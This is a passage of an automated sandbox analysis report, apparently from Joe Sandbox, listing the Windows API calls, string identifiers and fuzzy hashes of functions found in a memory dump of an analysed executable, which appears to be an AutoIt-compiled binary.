                                                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0021BAAE
                                                                                                                                                                  • GetProcessWindowStation.USER32 ref: 0021BAC7
                                                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 0021BAD1
                                                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0021BAEB
                                                                                                                                                                    • Part of subcall function 0021B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0021B9EC), ref: 0021B8C5
                                                                                                                                                                    • Part of subcall function 0021B8B0: CloseHandle.KERNEL32(?,?,0021B9EC), ref: 0021B8D7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                                                                  • Opcode ID: 716775bed74b9e42da564070432e7e7bb73f569c5b1aaa025fa07b73de76670a
                                                                                                                                                                  • Instruction ID: 5270944af48300f42fb4f0080e0c182a53bc0219c07829edac19e49475adb47a
                                                                                                                                                                  • Opcode Fuzzy Hash: 716775bed74b9e42da564070432e7e7bb73f569c5b1aaa025fa07b73de76670a
                                                                                                                                                                  • Instruction Fuzzy Hash: E4819F71D1020DAFDF129FA4DD49AEEBBB9EF18304F04815AF814A6161DB718E64DF60
                                                                                                                                                                  Function 00232044 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00232065
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0023207A
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232091
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 002320A3
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 002320D5
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 002320E0
                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 002320FC
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232123
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0023213A
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0023214C
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00293A68), ref: 0023216A
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00232174
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00232181
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00232191
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Attributes
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 70642500-438819550
                                                                                                                                                                  • Opcode ID: eed476a1a2007dd237535d723de3e89522968dae270eaa802c1f9e4b94a3affc
                                                                                                                                                                  • Instruction ID: b0b3db2cc6b658be479a93df57e12e5734fab81a36a44e3cf56e14553b899bf0
                                                                                                                                                                  • Opcode Fuzzy Hash: eed476a1a2007dd237535d723de3e89522968dae270eaa802c1f9e4b94a3affc
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A31A371A1021EAECB14DFB4ED4CADE77AC9F06324F104096F958E2191DBB0DA68CE64
                                                                                                                                                                  Function 0024F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 0024F14B
                                                                                                                                                                    • Part of subcall function 0024D5EE: ClientToScreen.USER32(?,?), ref: 0024D617
                                                                                                                                                                    • Part of subcall function 0024D5EE: GetWindowRect.USER32(?,?), ref: 0024D68D
                                                                                                                                                                    • Part of subcall function 0024D5EE: PtInRect.USER32(?,?,0024EB2C), ref: 0024D69D
                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0024F1B4
                                                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0024F1BF
                                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0024F1E2
                                                                                                                                                                  • _wcscat.LIBCMT ref: 0024F212
                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0024F229
                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0024F242
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0024F259
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0024F27B
                                                                                                                                                                  • DragFinish.SHELL32(?), ref: 0024F282
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0024F36D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                                                                  • Opcode ID: e20820a36a96e9be1ad805e1ad7b5919cea01df1b4c2f2439b42424b44ecd1b8
                                                                                                                                                                  • Instruction ID: e07b079558de8a91322001e1dd91d7199d7e8231fab4e1694a93ddcc2f611cd3
                                                                                                                                                                  • Opcode Fuzzy Hash: e20820a36a96e9be1ad805e1ad7b5919cea01df1b4c2f2439b42424b44ecd1b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F615872508344AFC700EF60EC89D9FBBE8BF99714F104A29F695921A1DB709A19CB52
                                                                                                                                                                  Function 0023219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002321C0
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 002321D5
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 002321EC
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0023221B
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00232226
                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00232242
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232269
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232280
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00232292
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00293A68), ref: 002322B0
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002322BA
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 002322C7
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 002322D7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File_wcscmp$Close$CurrentDirectoryFirstNext
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 4190467141-438819550
                                                                                                                                                                  • Opcode ID: dd1f24359eb87d724125ecaf588ad94256b7e61edcc5d5bc03072b22270c3be1
                                                                                                                                                                  • Instruction ID: 0f96845114ac6600c3f31c9e8783a23df9b687be37aa7519708d45002162dd74
                                                                                                                                                                  • Opcode Fuzzy Hash: dd1f24359eb87d724125ecaf588ad94256b7e61edcc5d5bc03072b22270c3be1
                                                                                                                                                                  • Instruction Fuzzy Hash: 8031B471A1121EAECF14EFA4EC48EDE77AC9F45324F104195EC14A21D1DBB0DEA9CE64
                                                                                                                                                                  Function 001E6BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove_memset
                                                                                                                                                                  • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                                                  • API String ID: 3555123492-286096704
                                                                                                                                                                  • Opcode ID: fb568368f1660ba3d0f8ed8588887d05882ab08d91578c58ff448aca2254dc30
                                                                                                                                                                  • Instruction ID: 3634dc4f6ca6ba7106371dcbbe536bb76a7f96caadd5a04ebeb76055dea0d2d8
                                                                                                                                                                  • Opcode Fuzzy Hash: fb568368f1660ba3d0f8ed8588887d05882ab08d91578c58ff448aca2254dc30
                                                                                                                                                                  • Instruction Fuzzy Hash: CB72E071E1065ACBDF28CF99C8807ADB7B1FF58314F2581A9D845AB381E734AE90DB40
                                                                                                                                                                  Function 0024ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0024ED0C
                                                                                                                                                                  • GetFocus.USER32 ref: 0024ED1C
                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0024ED27
                                                                                                                                                                  • _memset.LIBCMT ref: 0024EE52
                                                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 0024EE7D
                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 0024EE9D
                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0024EEB0
                                                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0024EEE4
                                                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0024EF2C
                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0024EF64
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0024EF99
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                                                                  • Opcode ID: 127bacdbec29ba26a7886a4b814e68f48fc4e2d6881d757084b552091fc230b0
                                                                                                                                                                  • Instruction ID: 51465d1f8e873b4bb1c9e10b48e91f4132610cc3beaf319305c37be984e23f43
                                                                                                                                                                  • Opcode Fuzzy Hash: 127bacdbec29ba26a7886a4b814e68f48fc4e2d6881d757084b552091fc230b0
                                                                                                                                                                  • Instruction Fuzzy Hash: E281E271618302EFEB18CF14D888A6BBBE8FF88354F02492DF99597291D770D925CB52
                                                                                                                                                                  Function 0021B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0021B903
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetLastError.KERNEL32(?,0021B3CB,?,?,?), ref: 0021B90D
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0021B3CB,?,?,?), ref: 0021B91C
                                                                                                                                                                    • Part of subcall function 0021B8E7: RtlAllocateHeap.NTDLL(00000000,?,0021B3CB), ref: 0021B923
                                                                                                                                                                    • Part of subcall function 0021B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0021B93A
                                                                                                                                                                    • Part of subcall function 0021B982: GetProcessHeap.KERNEL32(00000008,0021B3E1,00000000,00000000,?,0021B3E1,?), ref: 0021B98E
                                                                                                                                                                    • Part of subcall function 0021B982: RtlAllocateHeap.NTDLL(00000000,?,0021B3E1), ref: 0021B995
                                                                                                                                                                    • Part of subcall function 0021B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0021B3E1,?), ref: 0021B9A6
                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0021B3FC
                                                                                                                                                                  • _memset.LIBCMT ref: 0021B411
                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0021B430
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0021B441
                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0021B47E
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0021B49A
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0021B4B7
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0021B4C6
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0021B4CD
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0021B4EE
                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 0021B4F5
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0021B526
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0021B54C
                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0021B560
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2347767575-0
                                                                                                                                                                  • Opcode ID: 7d26b1d5bcdefa23618cf18b2b10997ef1229bd6ffefc1d9a7ca0e42e2cec7ed
                                                                                                                                                                  • Instruction ID: 8f19b6a22180502228b89b5fcb36395c39dcb13bd7f5d3962adf5833fb6224d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 7d26b1d5bcdefa23618cf18b2b10997ef1229bd6ffefc1d9a7ca0e42e2cec7ed
                                                                                                                                                                  • Instruction Fuzzy Hash: EA514B71E1020ABBDF01DFA4DC49AEEBBB9FF14700F048129F915A6291DB709A55CF60
                                                                                                                                                                  Function 00226B3F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001E31DA
                                                                                                                                                                    • Part of subcall function 00227B9F: __wsplitpath.LIBCMT ref: 00227BBC
                                                                                                                                                                    • Part of subcall function 00227B9F: __wsplitpath.LIBCMT ref: 00227BCF
                                                                                                                                                                    • Part of subcall function 00227C0C: GetFileAttributesW.KERNEL32(?,00226A7B), ref: 00227C0D
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226B9D
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226BBB
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00226BE2
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00226BF8
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 00226C57
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226C6A
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226C7D
                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00226CAB
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00226D37
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00226D53
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00226D61
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find_wcscat$File__wsplitpath$Close$AttributesFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                  • API String ID: 481317943-1173974218
                                                                                                                                                                  • Opcode ID: 723ff97126a2ce473e7af19960a348ecc5a6a181fe83ccf4e8a04f9752d43bad
                                                                                                                                                                  • Instruction ID: 667c1d352abd0fe8cdc615b3c13bad6d75769b97da340db513500b0f4a582eaa
                                                                                                                                                                  • Opcode Fuzzy Hash: 723ff97126a2ce473e7af19960a348ecc5a6a181fe83ccf4e8a04f9752d43bad
                                                                                                                                                                  • Instruction Fuzzy Hash: 8551357291416DBACB21EBD0EC89EDE777CAF05304F4445D6E54993041DB709B58CF61
                                                                                                                                                                  Function 001E5D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                                                  • API String ID: 0-2893523900
                                                                                                                                                                  • Opcode ID: e90a93d0f6c089938926b4e4b68a9f9d0aa550fa4e55d633e72ee43338227eef
                                                                                                                                                                  • Instruction ID: 877431699e7deb9b1e9d67721fc30b746d66e02d9724753a3ff5d8d948fb70e9
                                                                                                                                                                  • Opcode Fuzzy Hash: e90a93d0f6c089938926b4e4b68a9f9d0aa550fa4e55d633e72ee43338227eef
                                                                                                                                                                  • Instruction Fuzzy Hash: A062B2B1E10659DBDF24CF99C8807AEB7B5BF58350F25816AE805EB281D7709E80CF90
                                                                                                                                                                  Function 00226E4A Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001E31DA
                                                                                                                                                                    • Part of subcall function 00227C0C: GetFileAttributesW.KERNEL32(?,00226A7B), ref: 00227C0D
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226E7E
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00226E99
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00226EAE
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 00226EDD
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226EEF
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226F01
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00226F22
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00226F3D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
